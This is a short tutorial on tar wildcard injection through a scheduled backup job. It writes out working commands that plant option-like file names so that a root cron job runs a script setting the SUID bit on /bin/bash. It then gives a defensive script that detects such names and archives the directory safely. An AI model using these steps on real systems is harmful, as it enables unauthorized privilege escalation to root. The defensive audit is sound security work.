Tasks with Wildcard

A common mistake is to use a wildcard in a scheduled task's command. For example, a user who wants to archive the entire contents of a folder periodically may add a * to the end of the command so that every file dropped into that folder is included. The scheduled command may look like this:

tar -zcf backup.tar.gz *

This is a problem because, when the command runs, the shell substitutes the file names in the directory for the * before tar starts. If a file name is structured like a command-line option, tar treats it as an option rather than as a file to archive, and it takes effect as part of this tar command.

Let us add files to the directory whose names look like tar options that run a script setting the SUID bit on bash:

echo '#!/bin/bash' > shell.sh
echo 'chmod +s /bin/bash' >> shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

This creates 3 files in the directory, 2 of which have names that tar reads as options. When the scheduled tar command finally runs, it effectively becomes:

tar -zcf backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh shell.sh

After the scheduled task runs, the SUID bit is set on bash, allowing the user to gain a root shell.
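
From the defender's side, the same directory can be audited for option-like file names and archived without a bare wildcard. The script below is an added example, not part of the original page; the function names (find_option_like_names, safe_backup, make_sample_dir) and the sample directory are assumptions constructed for illustration, and shell.sh here only writes a harmless marker file.

```shell
#!/bin/sh
# Added example (not from the original page): audit a directory that a
# scheduled tar job archives, and archive it without a bare wildcard.

# Print each entry of DIR whose name begins with "-". An unquoted * puts
# these names on the command line, where tar parses them as options.
find_option_like_names() {
    for entry in "$1"/-*; do
        if [ -e "$entry" ]; then
            printf '%s\n' "${entry##*/}"
        fi
    done
}

# Archive the contents of SRC_DIR into OUT (OUT must lie outside SRC_DIR).
# "-C SRC_DIR ." gives tar one fixed path, so no file name reaches its
# option parser. If a glob is required, "tar -zcf OUT ./*" or
# "tar -zcf OUT -- *" has the same effect.
safe_backup() {
    tar -zcf "$2" -C "$1" .
}

# Constructed sample input: the file names from the text above, with the
# script body replaced by a harmless marker write.
make_sample_dir() {
    mkdir -p "$1"
    echo 'touch MARKER' > "$1/shell.sh"
    : > "$1/--checkpoint=1"
    : > "$1/--checkpoint-action=exec=sh shell.sh"
}

work=$(mktemp -d)
make_sample_dir "$work/data"
echo "Option-like names in $work/data:"
find_option_like_names "$work/data"
safe_backup "$work/data" "$work/backup.tar.gz"
echo "Archive members:"
tar -tzf "$work/backup.tar.gz"
rm -rf "$work"
```

Any name reported by find_option_like_names in a directory that a privileged scheduled job archives is worth investigating, since ordinary backup content rarely starts with a dash.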
